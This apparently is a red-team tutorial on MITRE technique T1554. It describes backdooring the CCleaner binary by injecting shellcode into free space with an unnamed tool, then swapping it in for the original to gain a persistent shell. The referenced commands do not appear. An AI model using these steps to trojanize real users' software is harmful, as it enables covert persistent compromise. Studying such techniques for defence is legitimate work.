T1554:Compromise Client Software Binary

Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary ( or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this persistent access to the host.

Examples:

On this technique we can see it's a little self-explanatory we grab a legitimate binary from the workstation usually something widely use in the Company or Industry and we Inject our malicious code onto the legitimate binary without compromising it's normal functionality. There is a great tool out there a little bit outdated (as of writing there is a new one being developed for July 2021).

Let us use this tool to create a backdoored compromised binary, in this example I will use the Ccleaner application very well known for tidying up our windows machines for speed or any unnecessary/left over files.

I will focus on the 64bit version as this is what the shortcuts are currently running:

Let us grab this binary and take it to our Attacking machine.

Here is the command-line example used to backdoor the application:

Once the tool is executing it will try and locate for free space to inject our shellcode that is available on the binary, if so it will ask us to choose from the variety of options on where to locate the code.

Once it is done, it will locate the newly created backdoored binary into a "backdoored" folder

This new binary containing its original functionality will know give us persistence at a user level. We can replace the original with our backdoored one as we will gain a shell but the original execution of the binary will remain the same.